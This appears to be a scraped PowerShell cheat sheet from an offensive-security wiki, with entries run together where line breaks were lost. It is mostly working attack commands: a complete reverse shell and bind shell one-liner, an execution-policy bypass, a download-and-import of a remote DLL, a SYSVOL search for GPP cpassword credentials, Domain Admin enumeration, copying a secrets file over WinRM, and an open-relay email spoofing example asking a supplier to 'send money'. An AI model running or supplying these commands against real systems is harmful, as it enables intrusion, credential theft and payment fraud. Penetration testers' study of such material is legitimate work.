powershell
Antimalware Scan Interface (AMSI) bypass generator
Active Directory PowerShell Module
This way the Active Directory PowerShell module can be used portable without administrator privileges. For example, when running in Azure Virtual Desktops or AzureAD managed devices, you will probably get the error message Unable to find a default server with Active Directory Web Services running.. Use the -Server DC01.offsec.nl flag after your CMDlet.
mkdir C:\temp; iwr https://github.com/crypt0rr/filehosting/raw/master/Microsoft.ActiveDirectory.Management.dll -OutFile C:\temp\1234hoedjevanpapier.dll; Import-Module C:\temp\1234hoedjevanpapier.dllPowerShell: Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -Verbose
Adjust execution policy
Set-ExecutionPolicy -scope process -execution bypassCheck ‘ms-DS-MachineAccountQuota’
Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuotaList users with ‘Store passwords using reversible encryption’ enabled
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControlFinding cpassword
findstr /s /n /i /p cpassword $env:logonserver\sysvol\*Get members of specific group
Get-ADGroupMember āDomain AdminsāGet-ADGroupMember āDomain Adminsā | select SamAccountNameGet details
$env:logonserverCheck which users home directories you have access to
gci C:\users\*\*Enable access to C-drive in Explorer
subst z: c:\Check how many computerobjects can be added by a user
Get-ADObject ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuotaOverview domain admins
Where ‘Password Never Expires’ is set.
Get-ADGroupMembers 'Domain Admins' | Foreach-Object {
Get-ADUser -Filter * -Properties | Select-Object Name,DisplayName,sAMAccountName,PasswordLastSet,PasswordNeverExpires
} | Sort-Object Name, PasswordLastSet, PasswordNeverExpires | Format-Table -AutoSizeWhere ‘Password Never Expires’ is NOT set.
Get-NetGroupMember 'Domain Admins' | Foreach-Object {
Get-NetUser -Filter * | Select-Object Name,DisplayName,sAMAccountName,PwdLastSet,AccountExpires
} | Sort-Object Select-Object Name,PwdLastSet | Format-Table -AutoSizeCheck secureboot enabled
Confirm-SecureBootUEFIList users with PasswordNeverExpires enabled
Import-Module ActiveDirectory
Get-ADUser -filter * -properties Name, PasswordNeverExpires | where { $_.passwordNeverExpires -eq "true" } | where {$_.enabled -eq "true" }List Domain Admins where ‘Account is sensitive an cannot be delegated’ is not set
Import-Module ActiveDirectory
Get-ADGroupMember "Domain Admins" | Get-ADUser -Properties AccountNotDelegated | Where-Object {-not $_.AccountNotDelegated} | select AccountNotDelegated,Name,SamAccountNameChange user agent
iwr -UserAgent 'Non existing user agent in use'Enable repository use
For PowerShell 4 and higher. For 5.1 and higher you can try Register-PSRepository -default first otherwise use code below.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Install-PackageProvider -Name NuGet -RequiredVersion 2.8.5.208 -Force
Register-PSRepository -Name PSGallery -SourceLocation https://www.powershellgallery.com/api/v2/ -PublishLocation https://www.powershellgallery.com/api/v2/package/ -ScriptSourceLocation https://www.powershellgallery.com/api/v2/items/psscript/ -ScriptPublishLocation https://www.powershellgallery.com/api/v2/package/ -InstallationPolicy Trusted -PackageManagementProvider NuGet
Install-Module $ModuleName -scope CurrentUserCopy remote file to local (WinRM)
$ses = New-PSSession -ComputerName DC01 -Credentials $(Get-Credential)
Copy-Item -FromSession $ses C:\Users\adm-johndo\DC01\secrets.txt Z:\localdisk\secrets.txtOpen Relay
Send-MailMessage -From 'Not John Do <finance@offsec.nl>' -To 'supplier@offsec.nl' -Subject 'Please send money' -SmtpServer 'openrelay.offsec.nl'Download a file from a remote resource
When ran from cmd.exe add powershell -c "<command>"
(new-object System.Net.WebClient).DownloadFile('https://www.7-zip.org/a/7z2201-x64.exe','C:\Users\crypt0rr\Desktop\7z2201-x64.exe')Shells (reverse/bind)
Reverse shell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<TARGET-IP-HERE>',<TARGET-PORT-HERE>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"Bind shell
0.0.0.0- will bind to every IP-address available on the local system
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',<TARGET-PORT-HERE>);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"Port Scan
$ Test-NetConnection DC01.offsec.nl -port 389
ComputerName : DC01.offsec.nl
RemoteAddress : 10.10.10.10
RemotePort : 389
InterfaceAlias : Ethernet
SourceAddress : 10.0.0.4
TcpTestSucceeded : True